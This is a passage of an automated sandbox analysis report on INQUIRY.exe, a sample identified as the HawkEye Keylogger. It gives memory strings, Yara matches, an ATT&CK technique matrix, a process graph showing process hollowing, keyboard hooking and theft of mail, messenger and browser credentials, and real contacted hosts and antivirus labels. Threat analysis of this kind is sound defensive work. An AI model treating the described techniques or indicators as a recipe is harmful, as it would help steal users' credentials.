                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exeString found in binary or memory: HawkEye_Keylogger_Stealer_Records_
                    Source: INQUIRY.exeString found in binary or memory: HawkEyeKeylogger
                    Source: INQUIRY.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmpString found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmpString found in binary or memory: q#"HawkEye_Keylogger_Stealer_Records_
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: HawkEyeKeylogger
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: q#"HawkEye_Keylogger_Stealer_Records_
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exeString found in binary or memory: HawkEye_Keylogger_Stealer_Records_
                    Source: INQUIRY.exeString found in binary or memory: HawkEyeKeylogger
                    Source: INQUIRY.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmpString found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmpString found in binary or memory: q#"HawkEye_Keylogger_Stealer_Records_
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: HawkEyeKeylogger
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: q#"HawkEye_Keylogger_Stealer_Records_
                    Yara detected HawkEye KeyloggerShow sources
                    Source: Yara matchFile source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.863232173.0000000002DE0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: WerFault.exe PID: 6776, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6808, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 5896, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6076, type: MEMORY
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Replication Through Removable Media1Windows Management Instrumentation21DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential Dumping1System Time Discovery1Replication Through Removable Media1Archive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsNative API11Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information11Input Capture211Peripheral Device Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsShared Modules1Logon Script (Windows)Process Injection511Obfuscated Files or Information21Credentials in Registry2Account Discovery1SMB/Windows Admin SharesScreen Capture1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing41Credentials In Files1File and Directory Discovery1Distributed Component Object ModelEmail Collection1Scheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsSystem Information Discovery39SSHInput Capture211Data Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsQuery Registry1VNCClipboard Data3Exfiltration Over C2 ChannelApplication Layer Protocol13Jamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsModify Registry1DCSyncSecurity Software Discovery1101Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion6Proc FilesystemVirtualization/Sandbox Evasion6Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection511/etc/passwd and /etc/shadowProcess Discovery3Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingApplication Window Discovery11Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                    Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Owner/User Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                    Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeyloggingRemote System Discovery1Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                    Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskMasquerade Task or ServiceGUI Input CaptureSystem Network Configuration Discovery1Exploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 319686 Sample: INQUIRY.exe Startdate: 18/11/2020 Architecture: WINDOWS Score: 100 94 121.205.6.0.in-addr.arpa 2->94 96 whatismyipaddress.com 2->96 124 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->124 126 Found malware configuration 2->126 128 Malicious sample detected (through community Yara rule) 2->128 130 10 other signatures 2->130 14 INQUIRY.exe 2->14         started        signatures3 process4 signatures5 172 Detected unpacking (changes PE section rights) 14->172 174 Detected unpacking (creates a PE file in dynamic memory) 14->174 176 Detected unpacking (overwrites its own PE header) 14->176 178 2 other signatures 14->178 17 INQUIRY.exe 14->17         started        19 INQUIRY.exe 15 6 14->19         started        process6 dnsIp7 23 INQUIRY.exe 17->23         started        98 mail.iigcest.com 166.62.27.57, 49750, 49774, 587 AS-26496-GO-DADDY-COM-LLCUS United States 19->98 100 121.205.6.0.in-addr.arpa 19->100 102 2 other IPs or domains 19->102 132 Changes the view of files in windows explorer (hidden files and folders) 19->132 134 Writes to foreign memory regions 19->134 136 Allocates memory in foreign processes 19->136 138 3 other signatures 19->138 26 vbc.exe 1 19->26         started        28 WerFault.exe 3 9 19->28         started        31 vbc.exe 13 19->31         started        33 dw20.exe 22 6 19->33         started        signatures8 process9 file10 154 Maps a DLL or memory area into another process 23->154 35 INQUIRY.exe 23->35         started        37 INQUIRY.exe 6 23->37         started        156 Tries to steal Mail credentials (via file registry) 26->156 158 Tries to steal Instant Messenger accounts or passwords 26->158 160 Tries to steal Mail credentials (via file access) 26->160 82 C:\ProgramData\Microsoft\...\WER1B59.tmp.mdmp, Mini 28->82 dropped 84 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 28->84 dropped signatures11 process12 dnsIp13 41 INQUIRY.exe 35->41         started        104 mail.iigcest.com 37->104 106 121.205.6.0.in-addr.arpa 37->106 108 whatismyipaddress.com 37->108 140 Writes to foreign memory regions 37->140 142 Allocates memory in foreign processes 37->142 144 Sample uses process hollowing technique 37->144 146 2 other signatures 37->146 44 vbc.exe 37->44         started        46 WerFault.exe 37->46         started        49 dw20.exe 37->49         started        51 vbc.exe 37->51         started        signatures14 process15 file16 164 Maps a DLL or memory area into another process 41->164 53 INQUIRY.exe 41->53         started        55 INQUIRY.exe 41->55         started        166 Tries to steal Instant Messenger accounts or passwords 44->166 168 Tries to steal Mail credentials (via file access) 44->168 86 C:\ProgramData\Microsoft\...\WERAB44.tmp.mdmp, Mini 46->86 dropped 88 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 46->88 dropped signatures17 process18 dnsIp19 59 INQUIRY.exe 53->59         started        110 121.205.6.0.in-addr.arpa 55->110 112 104.16.155.36, 443, 49777, 49778 CLOUDFLARENETUS United States 55->112 114 whatismyipaddress.com 55->114 162 Installs a global keyboard hook 55->162 62 dw20.exe 55->62         started        signatures20 process21 signatures22 170 Maps a DLL or memory area into another process 59->170 64 INQUIRY.exe 59->64         started        68 INQUIRY.exe 59->68         started        process23 dnsIp24 90 121.205.6.0.in-addr.arpa 64->90 92 whatismyipaddress.com 64->92 116 Writes to foreign memory regions 64->116 118 Allocates memory in foreign processes 64->118 120 Sample uses process hollowing technique 64->120 122 2 other signatures 64->122 70 vbc.exe 64->70         started        73 vbc.exe 64->73         started        75 WerFault.exe 64->75         started        78 dw20.exe 64->78         started        signatures25 process26 file27 148 Tries to steal Instant Messenger accounts or passwords 70->148 150 Tries to steal Mail credentials (via file access) 70->150 152 Tries to harvest and steal browser information (history, passwords, etc) 73->152 80 C:\ProgramData\Microsoft\...\WER7CAE.tmp.mdmp, Mini 75->80 dropped signatures28

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    INQUIRY.exe44%VirustotalBrowse
                    INQUIRY.exe42%ReversingLabsWin32.Trojan.Wacatac
                    INQUIRY.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    0.2.INQUIRY.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                    16.2.INQUIRY.exe.22e0000.1.unpack100%AviraTR/Inject.vcoldiDownload File
                    32.2.INQUIRY.exe.2680000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    32.2.INQUIRY.exe.2680000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    16.1.INQUIRY.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    1.2.INQUIRY.exe.21e0000.1.unpack100%AviraTR/Inject.vcoldiDownload File
                    33.1.INQUIRY.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    1.2.INQUIRY.exe.2270000.2.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    1.2.INQUIRY.exe.2270000.2.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    29.2.INQUIRY.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                    13.2.INQUIRY.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                    28.1.INQUIRY.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    16.2.INQUIRY.exe.2370000.2.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    16.2.INQUIRY.exe.2370000.2.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    0.2.INQUIRY.exe.2640000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    0.2.INQUIRY.exe.2640000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    27.2.INQUIRY.exe.2640000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    27.2.INQUIRY.exe.2640000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    33.2.INQUIRY.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    33.2.INQUIRY.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    1.1.INQUIRY.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    34.2.INQUIRY.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                    17.2.INQUIRY.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                    37.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
                    6.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
                    0.2.INQUIRY.exe.25f0000.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                    28.2.INQUIRY.exe.22f0000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    28.2.INQUIRY.exe.22f0000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    33.2.INQUIRY.exe.22f0000.2.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    33.2.INQUIRY.exe.22f0000.2.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    27.2.INQUIRY.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                    1.2.INQUIRY.exe.2300000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    1.2.INQUIRY.exe.2300000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    16.2.INQUIRY.exe.2490000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    16.2.INQUIRY.exe.2490000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    33.2.INQUIRY.exe.2210000.1.unpack100%AviraTR/Inject.vcoldiDownload File
                    28.2.INQUIRY.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    28.2.INQUIRY.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    13.2.INQUIRY.exe.2660000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    13.2.INQUIRY.exe.2660000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    33.2.INQUIRY.exe.2380000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    33.2.INQUIRY.exe.2380000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    20.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
                    2.2.INQUIRY.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
